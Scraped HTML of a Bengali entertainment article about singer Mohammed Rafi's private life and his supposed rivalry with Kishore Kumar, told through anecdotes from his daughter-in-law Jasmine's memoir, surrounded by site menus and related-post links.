            <div class="thumb-wrap"><a href="http://banglalive.com/the-womanizer-the-humble-husband-and-a-new-found-love/" rel="bookmark" title="বউদিজীবী"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/07/story-of-an-womanizer-198x143.jpg" alt="" title="বউদিজীবী"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/the-womanizer-the-humble-husband-and-a-new-found-love/" rel="bookmark" title="বউদিজীবী">বউদিজীবী</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/breaking-news-a-hilarious-cartoon-strip-in-bengali/" rel="bookmark" title="ব্রেকিং নিউজ!"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/07/cartoon-strip-1-198x143.jpg" alt="" title="ব্রেকিং নিউজ!"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/breaking-news-a-hilarious-cartoon-strip-in-bengali/" rel="bookmark" title="ব্রেকিং নিউজ!">ব্রেকিং নিউজ!</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_9_598490d358da2" data-td_block_id="td_uid_9_598490d358da2"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_9_598490d358da2" data-td_block_id="td_uid_9_598490d358da2"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-202843"><a href="http://banglalive.com/category/sports-news-and-feature-in-bengali/">খেলা</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-136381"><a href="http://banglalive.com/astrology/">রাশিফল</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-136384"><a href="http://banglalive.com/blog/">ব্লগ</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-184743"><a href="http://banglalive.com/category/podcast/">Podcast</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-200411"><a target="_blank" href="http://banglalive.com/uralpool/">উড়ালপুল</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-136546"><a href="http://banglalive.com/category/best-recipes-in-bengali/">রেসিপি</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_11_598490d362f3e = new td_block();
block_td_uid_11_598490d362f3e.id = "td_uid_11_598490d362f3e";
block_td_uid_11_598490d362f3e.atts = '{"limit":4,"td_column_number":3,"ajax_pagination":"next_prev","category_id":"11","show_child_cat":"5"}';
block_td_uid_11_598490d362f3e.td_cur_cat = "11";
block_td_uid_11_598490d362f3e.td_column_number = "1";
block_td_uid_11_598490d362f3e.block_type = "td_mega_menu";
block_td_uid_11_598490d362f3e.post_count = "4";
block_td_uid_11_598490d362f3e.found_posts = "298";
block_td_uid_11_598490d362f3e.max_num_pages = "75";
block_td_uid_11_598490d362f3e.header_color = "";
block_td_uid_11_598490d362f3e.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_11_598490d362f3e);
</script><div class="td_block_wrap td_block_mega_menu"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><div><a class="cur-sub-cat ajax-sub-cat-mega sub-cat-td_uid_11_598490d362f3e" id="sub-cat-td_uid_11_598490d362f3e-11" data-cat_id="11"
                        data-td_block_id="td_uid_11_598490d362f3e" href="http://banglalive.com/category/best-recipes-in-bengali/">All</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_11_598490d362f3e" id="sub-cat-td_uid_11_598490d362f3e-149" data-cat_id="149" data-td_block_id="td_uid_11_598490d362f3e" href="http://banglalive.com/category/best-recipes-in-bengali/cake/">কেক</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_11_598490d362f3e" id="sub-cat-td_uid_11_598490d362f3e-150" data-cat_id="150" data-td_block_id="td_uid_11_598490d362f3e" href="http://banglalive.com/category/best-recipes-in-bengali/chatani/">চাটনি</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_11_598490d362f3e" id="sub-cat-td_uid_11_598490d362f3e-152" data-cat_id="152" data-td_block_id="td_uid_11_598490d362f3e" href="http://banglalive.com/category/best-recipes-in-bengali/continental/">কন্টিনেন্টাল</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_11_598490d362f3e" id="sub-cat-td_uid_11_598490d362f3e-153" data-cat_id="153" data-td_block_id="td_uid_11_598490d362f3e" href="http://banglalive.com/category/best-recipes-in-bengali/egg/">ডিম</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_11_598490d362f3e" id="sub-cat-td_uid_11_598490d362f3e-154" data-cat_id="154" data-td_block_id="td_uid_11_598490d362f3e" href="http://banglalive.com/category/best-recipes-in-bengali/fish/">মাছ</a></div></div></div><div id=td_uid_11_598490d362f3e class="td_block_inner animated fadeInDown SELECT SQL_CALC_FOUND_ROWS  wp_posts.ID FROM wp_posts  LEFT JOIN wp_term_relationships ON (wp_posts.ID = wp_term_relationships.object_id) WHERE 1=1  AND ( 
  wp_term_relationships.term_taxonomy_id IN (11,149,150,152,153,154,155,156,157,158,159,160,161,162,163)
) AND wp_posts.post_type IN ('post', 'page', 'attachment', 'revision', 'nav_menu_item', 'custom_css', 'customize_changeset', 'forum', 'topic', 'reply', 'wpc-weather', 'wpcf7_contact_form', 'ngg_album', 'ngg_gallery', 'ngg_pictures', 'lightbox_library', 'contestants', 'blogs', 'astro', 'displayed_gallery', 'display_type', 'gal_display_source') AND ((wp_posts.post_status = 'publish')) GROUP BY wp_posts.ID ORDER BY wp_posts.post_date DESC LIMIT 0, 4">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/ilish-korma-dhakai-recipe-in-bengali/" rel="bookmark" title="ইলিশ কোরমা"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/06/ilisha-korma-dhakai-recipe-198x143.jpg" alt="" title="ইলিশ কোরমা"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/ilish-korma-dhakai-recipe-in-bengali/" rel="bookmark" title="ইলিশ কোরমা">ইলিশ কোরমা</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/unique-and-delicious-honey-cake-recipe-in-bengali/" rel="bookmark" title="হানি কেক"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/06/honey-cake-recipe-bengali-198x143.jpg" alt="" title="হানি কেক"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/unique-and-delicious-honey-cake-recipe-in-bengali/" rel="bookmark" title="হানি কেক">হানি কেক</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/easy-to-cook-honey-chicken-tikka-recipe-in-bengali/" rel="bookmark" title="হানি চিকেন টিক্কা"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/06/honey-chicken-tikka-bengali-recipe-198x143.jpg" alt="" title="হানি চিকেন টিক্কা"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/easy-to-cook-honey-chicken-tikka-recipe-in-bengali/" rel="bookmark" title="হানি চিকেন টিক্কা">হানি চিকেন টিক্কা</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/easy-to-cook-keema-pulao-recipe-in-bengali/" rel="bookmark" title="কিমা পোলাও"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/06/keema-pulao-bengali-recipe-198x143.jpg" alt="" title="কিমা পোলাও"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/easy-to-cook-keema-pulao-recipe-in-bengali/" rel="bookmark" title="কিমা পোলাও">কিমা পোলাও</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_11_598490d362f3e" data-td_block_id="td_uid_11_598490d362f3e"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_11_598490d362f3e" data-td_block_id="td_uid_11_598490d362f3e"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-136389"><a href="http://banglaliveshopping.com/">শপিং</a></li>
</ul></div>                    </div>



                </div>

                <div class="span1" id="td-top-search">
                    <!-- Search -->
                    <div class="header-search-wrap">
                        <div class="dropdown header-search">
                            <a id="search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><span class="td-sp td-sp-ico-search"></span></a>
                            <div class="dropdown-menu" aria-labelledby="search-button">
                                <form role="search" method="get" class="td-search-form" action="http://banglalive.com/">
                                    <div class="td-head-form-search-wrap">
                                        <input class="needsclick" id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
                                    </div>
                                </form>
                                <div id="td-aj-search"></div>
                            </div>
                        </div>
                    </div>
                </div>


            </div> <!-- /.row-fluid -->
        </div> <!-- /.td-menu-wrap -->
    </div> <!-- /.td-menu-background -->
</div> <!-- /.td-menu-placeholder -->
<article id="post-208502" class="urhalphool post-208502 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment-news category-top-story category-you-shouldnt-miss category-entertainment" itemscope itemtype="http://schema.org/Article">

    
        <div class="container td-page-wrap">
            <div class="row">
                <div class="span12">
                    <div class="td-grid-wrap">
                        <div class="container-fluid">
                            <div class="row-fluid ">
                <div class="span12">

            <div class="entry-crumbs"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="" class="entry-crumb" itemprop="url" href="http://banglalive.com"><span itemprop="title">মূল পাতা     </span></a></span> <span class="td-sp td-sp-breadcrumb-arrow td-bread-sep"></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="View all posts in বিনোদন" class="entry-crumb" itemprop="url" href="http://banglalive.com/category/entertainment/"><span itemprop="title">বিনোদন</span></a></span> <span class="td-sp td-sp-breadcrumb-arrow td-bread-sep"></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="View all posts in Hottie কালচার" class="entry-crumb" itemprop="url" href="http://banglalive.com/category/entertainment/entertainment-news/"><span itemprop="title">Hottie কালচার</span></a></span> <span class="td-sp td-sp-breadcrumb-arrow td-bread-sep"></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content = "প্রতিদ্বন্দ্বী কিশোর কুমারকে হিংসে করতেন রক্ষণশীল মহম্মদ রফি ?">প্রতিদ্বন্দ্বী কিশোর কুমারকে হিংসে করতেন রক্ষণশীল মহম্মদ রফি ?</span></div>
            <header>
                <h1 itemprop="name" class="entry-title">প্রতিদ্বন্দ্বী কিশোর কুমারকে হিংসে করতেন রক্ষণশীল মহম্মদ রফি ?</h1>
                <div class="meta-info">
                    <ul class="td-category"><li class="entry-category s-বিনোদন"><a  href="http://banglalive.com/category/entertainment/">বিনোদন</a></li><li class="entry-category s-hottieকালচার"><a  href="http://banglalive.com/category/entertainment/entertainment-news/">Hottie কালচার</a></li><li class="entry-category s-সাম্প্রতিক"><a  href="http://banglalive.com/category/top-story/">সাম্প্রতিক</a></li><li class="entry-category s-পড়তেভুলবেননা"><a  href="http://banglalive.com/category/you-shouldnt-miss/">পড়তে ভুলবেন না</a></li></ul>                    <div class="td-clear-author"></div><span class="td-block-author"><span class="hide-ss">লিখেছেন </span> <a itemprop="author" href="http://banglalive.com/author/biyas/">বিয়াস</a> - </span><meta itemprop="interactionCount" content="UserComments:1"/>                    <time  itemprop="dateCreated" class="entry-date updated" datetime="2017-07-31T18:08:29+00:00" >Jul 31, 2017</time><meta itemprop="interactionCount" content="UserComments:1"/>                    <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="http://banglalive.com/how-was-md-rafi-as-a-person/#comments"></span>1 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-208502">641</span></div>                </div>
            </header>
        </div>
    </div> <!-- close the row from td_page_generator -->

    <div class="row-fluid "> <!-- open new row -->
                        <div class="span8 column_container td-post-content" role="main" itemprop="mainContentOfPage">
                        <div class="td-post-featured-image"><a href="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/07/rafi-new-1.jpg" data-caption=""><img width="700" height="500" itemprop="image" class="entry-thumb td-modal-image" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/07/rafi-new-1.jpg" alt="" title="rafi-new"/></a></div>
    <div class="td-post-text-content loop-single-2">
         <p>সময়টা সত্তরের দশক | মহম্মদ রফির জনপ্রিয়তা কমছে | কিশোর কুমার উঠে আসছেন | শচীন দেব বর্মনের জমানা শেষ | ছেলে রাহুল দেব বর্মন জাকিয়ে বসেছেন | তিনি নরম গলার রফিকে খুব একটা পছন্দ করতেন না | তার পছন্দ রাফ এন্ড টাফ গলার কিশোর কুমারকে | সব দেখেও শচীন কর্তা কিচ্ছু বলতে পারছেন না | এদিকে মনে মনে গুমরাচ্ছেন রফি | ‘আরধনা’ হিট করতেই সবাই রাজেশ খান্নাকে মাথায় নিয়ে নাচছে | সুপার স্টার-এর সিংহাসনে বসেই রাজেশের ফতোয়া, রফি নয় তার লিপের সব গান কিশোর গাইবেন | শুনে কষ্ট পেলেন বর্মন কর্তা | মন খারাপ রফির | শেষে আর থাকতে না পেরে বর্মন সাহাব ছেলেকে বললেন, ‘একবার রফিকে গান দিয়ে দেখ-ই না | ও পারবে.’ বাবার কথা ফেলতে না পেরে পঞ্চম, রফি সাহাবকে ডেকে ‘শান’ ছবির ‘ইয়াম্মা ইয়াম্মা’ গান দিয়ে বললেন, ‘গাইতে পারবেন?’ চুপচাপ বাড়ি ফিরে এলেন রফি | গোটা দিন ভাবলেন | পরের দিন ষ্টুডিও এসে গান রেকর্ডিং করলেন | গান সুনে রাহুল চুপ |‘ইয়াম্মা ইয়াম্মা’ সুপার হিট | এই ছিলেন মহম্মদ রফি | কম কথার মানুষ | ভীষণ নরম, ভদ্র |নিজের কাজ দিয়ে যা জবাব দেওয়ার, দিতেন |</p>
<p>ব্যক্তি মহম্মদ রফি কেমন ছিলেন? নিতান্ত ছাপোষা,আটপৌরে | একই সঙ্গে সামান্য রক্ষনশীল | রফির আমলে পাপারাৎজিদের হামলা ছিল না | তাই, ব্যক্তি জীবনে রফি কেমন ছিলেন, খুব কম লোকেই তা জানত | রফির মৃত্যুর পর জেসমিন, রফির দ্বিতীয় পুত্রবধু শ্বশুরমশাইকে নিয়ে লিখেছিলেন ‘মাই আব্বা মহম্মদ রফি ’ সেখানে ছোট ছোট ঘটনায় জেসমিন ছবি আঁকার চেষ্টা করেছেন শিল্পীর অন্তর্মুখী সত্তার |</p>
<p>জেসমিনকে মহম্মদ রফি যখন প্রথম দেখেছিলেন তখন জেসমিনের বয়স কত হবে? এই পনেরো কি ষোল! বলিউড-এর সেলিম-জাভেদ জুটির সেলিম খান ওই পুচকে মেয়ের চাচা | রফি সাহেবের ছেলের জন্য বিয়ের সম্বন্ধ এনে ছিলেন উনি | তখন অল্প বয়সেই শাদী হত অনেকেরই | তাই জেসমিনের বাড়ির লোক খুব একটা অবাক হননি | পাত্র আর তার বাড়ির লোকের কথা শোনার পর চোখ কপালে মেয়ের! চাচা কার বাড়িতে পাঠাচ্ছেন তাকে? মহম্মদ রফির বাড়ি! যার গান শুনে সে বড় হয়েছে! যার গলার রোম্যান্টিশিজম তাকে প্রেম করতে শিখিয়েছে! সে কিনা যার অন্ধ ভক্ত!</p>
<div style="clear:both; margin-top:0em; margin-bottom:1em;"><a href="http://banglalive.com/sanjay-khan-wife-beat-zeenat-aman/" target="_blank" rel="nofollow" class="uf7ed34007b9e48b4b8fa0be92a53479d"><!-- INLINE RELATED POSTS 1/3 //--><style> .uf7ed34007b9e48b4b8fa0be92a53479d , .uf7ed34007b9e48b4b8fa0be92a53479d .postImageUrl , .uf7ed34007b9e48b4b8fa0be92a53479d .centered-text-area { min-height: 80px; position: relative; } .uf7ed34007b9e48b4b8fa0be92a53479d , .uf7ed34007b9e48b4b8fa0be92a53479d:hover , .uf7ed34007b9e48b4b8fa0be92a53479d:visited , .uf7ed34007b9e48b4b8fa0be92a53479d:active { border:0!important; } .uf7ed34007b9e48b4b8fa0be92a53479d .clearfix:after { content: ""; display: table; clear: both; } .uf7ed34007b9e48b4b8fa0be92a53479d { display: block; transition: background-color 250ms; webkit-transition: background-color 250ms; width: 100%; opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; background-color: #000000; } .uf7ed34007b9e48b4b8fa0be92a53479d:active , .uf7ed34007b9e48b4b8fa0be92a53479d:hover { opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; background-color: #2980B9; } .uf7ed34007b9e48b4b8fa0be92a53479d .centered-text-area { width: 100%; position: relative; } .uf7ed34007b9e48b4b8fa0be92a53479d .ctaText { border-bottom: 0 solid #fff; color: #F39C12; font-size: 16px; font-weight: bold; margin: 0; padding: 0; text-decoration: underline; } .uf7ed34007b9e48b4b8fa0be92a53479d .postTitle { color: #FFFFFF; font-size: 16px; font-weight: 600; margin: 0; padding: 0; width: 100%; } .uf7ed34007b9e48b4b8fa0be92a53479d .ctaButton { background-color: #141414!important; color: #F39C12; border: none; border-radius: 3px; box-shadow: none; font-size: 14px; font-weight: bold; line-height: 26px; moz-border-radius: 3px; text-align: center; text-decoration: none; text-shadow: none; width: 80px; min-height: 80px; background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/intelly-related-posts/assets/images/simple-arrow.png)no-repeat; position: absolute; right: 0; top: 0; } .uf7ed34007b9e48b4b8fa0be92a53479d:hover .ctaButton { background-color: #3498DB!important; } .uf7ed34007b9e48b4b8fa0be92a53479d .centered-text { display: table; height: 80px; padding-left: 18px; top: 0; } .uf7ed34007b9e48b4b8fa0be92a53479d .uf7ed34007b9e48b4b8fa0be92a53479d-content { display: table-cell; margin: 0; padding: 0; padding-right: 108px; position: relative; vertical-align: middle; width: 100%; } .uf7ed34007b9e48b4b8fa0be92a53479d:after { content: ""; display: block; clear: both; } </style><div class="centered-text-area"><div class="centered-text" style="float: left;"><div class="uf7ed34007b9e48b4b8fa0be92a53479d-content"><span class="ctaText">আরও পড়ুন:</span>&nbsp; <span class="postTitle">সবার সামনেই জীনাত আমনকে ধরে পিটিয়েছিলেন সঞ্জয় খান ও তাঁর স্ত্রী জারিন!!</span></div></div></div><div class="ctaButton"></div></a></div><p>খবরটা কানে আসার পর থেকেই কেমন একটা ঘোরের মধ্যে দিয়ে কাটল জেসমিনের | তার মত সামান্য মেয়েকে রফি সাহাবের পছন্দ হবে? তারপর হঠাৎ চাচা একদিন হাঁফাতে হাঁফাতে এসে বললেন, &#8216;শিগগির তৈরী হয়ে নে জেসমিন | রফি সাহাব আসছেন তোকে দেখতে |&#8217; ষোলো বছরের ছোট মেয়েটা ঘেমে-নেয়ে অস্থির | একে স্বপ্নের মানুষের মুখোমুখি এই প্রথম | কেমন সাজলে তার পছন্দ হবে! এত রোমান্টিক গলা যার, তিনি নিশ্চয় মারাত্মক সুন্দর হবেন | তার মন পাওয়া কি চাট্টিখানি কথা? জেসমিন ভুলেই গেছিলেন, বিয়েটা রফি সাহাবের দ্বিতীয় ছেলে খালিদের সঙ্গে হচ্ছে | রফি সাহাবের সঙ্গে নয়!</p>
<p>যাই হোক, নির্দিষ্ট দিনে জেসমিন মনের মত করে সাজলো | অনেক বেছে নরম গোলাপী শিফনের শাড়ি পড়ল | গলায়, কানে, হাতে মুক্তর হালকা গয়না | রফি এলেন খালিদ আর বাড়ির অন্য লোকেদের নিয়ে | প্রথমে বাড়ির লোকের সঙ্গে কথা সারলেন | তারপর ডাক পড়ল জেসমিনের | গোলাপী শাড়ি-গয়নায় জেসমিন যেন সদ্য ফোটা জুই! রফি-র মুখোমুখি হতেই আতকে উঠলো বছর ষোলোর মেয়ে | কোথায় কার্তিকের মত চেহারা? এ তো একদম পাশের বাড়ির কাকু! জেসমিন ততক্ষণে ঠিক করে ফেলেছে খালেদকে কিছুতেই বিয়ে করবে না | এমন সময় সেই রোমান্টিক গলা প্রশ্ন করলো, আমাদের বাড়িতে শাড়ির সঙ্গে লম্বা হাতার ব্লাউজ পরা হয় | তুমি তেমনটা পরবে তো? সাপের মাথায় যেন ধুলো পড়ল | এই গলাকে অগ্রাহ্য করে কি করে জেসমিন? পুতুলের মত ঘাড় নেড়ে জানালো, পারবে | সঙ্গে সঙ্গে মায়াবী গলার মালিক মৃদু হেসে জানালেন, আমরা রাজি | এবার আপনাদের পালা!</p>
<p>এ তো গেল বিয়ের আগে শ্বশুরমশাইয়ের সঙ্গে বৌমার পয়লা মোলাকাতের গপ্পো | বিয়ের পর কি হলো? অনেক স্বপ্ন নিয়ে জেসমিন শ্বশুর ঘরে এসেছেন | যত না আগ্রহ নিজের স্বামীকে নিয়ে তার ডাবল শ্বশুরকে ঘিরে | বিয়ের আগে শুনেছিলেন, কত ফিল্ম স্টার নাকি দুবেলা আসেন বাড়িতে | যাদের পর্দায় দেখতেন তাদের এবার বাড়ি বসে জ্যান্ত দেখতে পাবেন, ভাবতেই আল্হাদে আঠখানা জেসমিনের মন| কনে বউ হয়ে পা রাখতেই সেই স্বপ্নে জল ঢেলে দিলেন রফি | খুব মৃদু কিন্তু দৃঢ়ভাবে জানিয়ে দিলেন, বাইরের মানুষের সামনে হুটহাট বেরোনো চলবে না | বিশেষ করে ফিল্মি দুনিয়ার লোকজনের সামনে | জেসমিনের মাথায় হাত | হায় হায়! এ কোন ঘরে এসে পড়লেন! যিনি সারাক্ষণ প্রেমের গান গাইছেন তিনি আদতে এতটাই প্রাচীনপন্থী! জেসমিনের আশা, একদিন গান রেকর্ডিং দেখতে যাবেন | তাতেও জল ঢাললেন রফি জেসমিনের বাবার বাড়ির লোককে রেকর্ডিং দেখিয়ে আনলেন | তবু বৌমাকে নিয়ে গেলেন না!</p>
<div style="clear:both; margin-top:0em; margin-bottom:1em;"><a href="http://banglalive.com/significance-of-the-sawan-somvar-vrat/" target="_blank" rel="nofollow" class="u6eedaacf0de91835f417b739eb2ca019"><!-- INLINE RELATED POSTS 2/3 //--><style> .u6eedaacf0de91835f417b739eb2ca019 , .u6eedaacf0de91835f417b739eb2ca019 .postImageUrl , .u6eedaacf0de91835f417b739eb2ca019 .centered-text-area { min-height: 80px; position: relative; } .u6eedaacf0de91835f417b739eb2ca019 , .u6eedaacf0de91835f417b739eb2ca019:hover , .u6eedaacf0de91835f417b739eb2ca019:visited , .u6eedaacf0de91835f417b739eb2ca019:active { border:0!important; } .u6eedaacf0de91835f417b739eb2ca019 .clearfix:after { content: ""; display: table; clear: both; } .u6eedaacf0de91835f417b739eb2ca019 { display: block; transition: background-color 250ms; webkit-transition: background-color 250ms; width: 100%; opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; background-color: #000000; } .u6eedaacf0de91835f417b739eb2ca019:active , .u6eedaacf0de91835f417b739eb2ca019:hover { opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; background-color: #2980B9; } .u6eedaacf0de91835f417b739eb2ca019 .centered-text-area { width: 100%; position: relative; } .u6eedaacf0de91835f417b739eb2ca019 .ctaText { border-bottom: 0 solid #fff; color: #F39C12; font-size: 16px; font-weight: bold; margin: 0; padding: 0; text-decoration: underline; } .u6eedaacf0de91835f417b739eb2ca019 .postTitle { color: #FFFFFF; font-size: 16px; font-weight: 600; margin: 0; padding: 0; width: 100%; } .u6eedaacf0de91835f417b739eb2ca019 .ctaButton { background-color: #141414!important; color: #F39C12; border: none; border-radius: 3px; box-shadow: none; font-size: 14px; font-weight: bold; line-height: 26px; moz-border-radius: 3px; text-align: center; text-decoration: none; text-shadow: none; width: 80px; min-height: 80px; background: url(http://blcdn-307f.kxcdn.com/wp-content/plugins/intelly-related-posts/assets/images/simple-arrow.png)no-repeat; position: absolute; right: 0; top: 0; } .u6eedaacf0de91835f417b739eb2ca019:hover .ctaButton { background-color: #3498DB!important; } .u6eedaacf0de91835f417b739eb2ca019 .centered-text { display: table; height: 80px; padding-left: 18px; top: 0; } .u6eedaacf0de91835f417b739eb2ca019 .u6eedaacf0de91835f417b739eb2ca019-content { display: table-cell; margin: 0; padding: 0; padding-right: 108px; position: relative; vertical-align: middle; width: 100%; } .u6eedaacf0de91835f417b739eb2ca019:after { content: ""; display: block; clear: both; } </style><div class="centered-text-area"><div class="centered-text" style="float: left;"><div class="u6eedaacf0de91835f417b739eb2ca019-content"><span class="ctaText">আরও পড়ুন:</span>&nbsp; <span class="postTitle">শ্রাবণ সোমবার ব্রতে শিবপুজো করলে পূর্ণ হয় ভক্তের যাবতীয় মনোবাঞ্ছা ?</span></div></div></div><div class="ctaButton"></div></a></div><p>শ্বশুরবাড়িতে আসতে আসতে পুরনো হলেন জেসমিন | রফি সাহাব তখন শ্বশুর কম, বাবা বেশি | জেসমিনকে ‘বহু’-র বদলে ‘বিটিয়া’ বলে ডাকছেন | একদিন বিকেলে জেসমিন বাড়ির সামনের রাস্তায় পায়চারী করছেন | দেখলেন, ক্লান্ত পায়ে রফি গাড়ি থেকে নামলেন | জেসমিন পায়ে পায়ে গিয়ে দাড়ালেন শ্বশুর-এর সামনে | তাকে দেখে রফির গলা থেকে একরাশ ব্যথা ঝরলো, ‘বিটিয়া, ওরা বড্ড খারাপ | এক তো আমায় দিয়ে উল্টোপাল্টা গান গাওয়াচ্ছে | তার ওপর বলে কিনা আমি কিশোরকে হিংসে করি! সত্যি আমি এত ছোট মনের?’</p>
<p>কি বলবেন জেসমিন! তিনি নিজের চোখে দেখেছেন, কিশোরজিকে ডেকে তার আব্বা কত প্রসংসা করেছেন! বলেছেন, ‘তুমি গায়ক-নায়ক | তুমি স্টেজ-এ গাইলে আরো নাম করবে |’ এদিকে খবরের কাগজে ফলাও করে ছাপছে দুজনের মিথ্যে ঝগড়ার কথা! সেদিন রফি তার বিটিয়া-কে বলেছিলেন, ‘এবার বুঝতে পারছ, কেন ফিল্মি দুনিয়ার আশপাশে তোমায় যেতে দিইনি!’ রেকর্ডিং-এ না নিয়ে যাওয়ার অনেকটা ক্ষোভ অনেকটা অভিমান জমে ছিল জেসমিনের মনে | রফির সেদিনের কথা শোনার পর জেসমিন বুঝেছিলেন, মহম্মদ রফি আগে ‘আব্বা’ পরে ‘তারকা’| তাই সংবেদনশীল মানুষটি পরিবারের গায়ে যাতে আঁচ না লাগে তার জন্যই সারাক্ষণ আগলাতেন ওরকম করে!</p>
    </div>


    <div class="clearfix"></div>

    <footer>
    
    
<!-- ___________ADDED_BY_SANNY_URAHPHOOL_____________ -->





                                
        <div class="td-social-sharing">
        
            <div class="td-tags-and-social-wrapper-box td-tags-and-social-wrapper-box-bottom-line">
            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=%E0%A6%AA%E0%A7%8D%E0%A6%B0%E0%A6%A4%E0%A6%BF%E0%A6%A6%E0%A7%8D%E0%A6%AC%E0%A6%A8%E0%A7%8D%E0%A6%A6%E0%A7%8D%E0%A6%AC%E0%A7%80+%E0%A6%95%E0%A6%BF%E0%A6%B6%E0%A7%8B%E0%A6%B0+%E0%A6%95%E0%A7%81%E0%A6%AE%E0%A6%BE%E0%A6%B0%E0%A6%95%E0%A7%87+%E0%A6%B9%E0%A6%BF%E0%A6%82%E0%A6%B8%E0%A7%87+%E0%A6%95%E0%A6%B0%E0%A6%A4%E0%A7%87%E0%A6%A8+%E0%A6%B0%E0%A6%95%E0%A7%8D%E0%A6%B7%E0%A6%A3%E0%A6%B6%E0%A7%80%E0%A6%B2+%E0%A6%AE%E0%A6%B9%E0%A6%AE%E0%A7%8D%E0%A6%AE%E0%A6%A6+%E0%A6%B0%E0%A6%AB%E0%A6%BF+%3F&url=http%3A%2F%2Fbanglalive.com%2Fhow-was-md-rafi-as-a-person%2F&via=BanglaLive" onclick="if(!document.getElementById('td_social_networks_buttons')){window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;}" ><div class="td-sp td-sp-share-twitter"></div><div class="td-social-but-text">Twitter</div></a>
            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fbanglalive.com%2Fhow-was-md-rafi-as-a-person%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-facebook"></div><div class="td-social-but-text">Facebook</div></a>
            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://banglalive.com/how-was-md-rafi-as-a-person/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-google"></div><div class="td-social-but-text">Google +</div></a>
